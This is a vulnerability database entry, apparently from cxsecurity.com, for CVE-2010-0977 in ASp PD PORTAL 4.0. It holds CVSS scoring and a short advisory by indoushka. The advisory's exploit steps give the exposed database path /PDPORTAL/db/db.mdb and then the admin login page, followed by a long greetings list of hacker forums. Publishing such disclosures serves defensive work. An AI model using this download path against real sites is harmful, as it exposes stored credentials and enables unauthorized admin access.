Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
ASp PD PORTAL 4.0 DB Download Vulnerability
2010.03.19
Credit:
indoushka
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2010-0977
CWE:
CWE-264
Ogólna skala CVSS:
5/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Brak
Wpływ na dostępność:
Brak
======================================================================================== | # Title : ASp PD PORTAL 4.0 DB Download Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | # DAte : 16/12/2009 | # Web Site : www.iq-ty.com | # Published: http://scripti.org/ | # Script : Powered by Alper Mutlu TOKS�Z (2008-2009) | # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) IIS 5.0 | # Bug : DB ====================== Exploit By indoushka ================================= # Exploit : 1- http://127.0.0.1/PDPORTAL/db/db.mdb 2- login http://127.0.0.1/PDPORTAL/admin ================================ Dz-Ghost Team =================================================== Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca) all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir www.mormoroth.net * www.securitywall.org * www.sec-code.com * --------------------------------------------------------------------------------------------------------
Referencje:
http://www.exploit-db.com/exploits/10995
http://secunia.com/advisories/38109
http://packetstormsecurity.org/1001-exploits/pdportal-disclose.txt
http://osvdb.org/61468
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top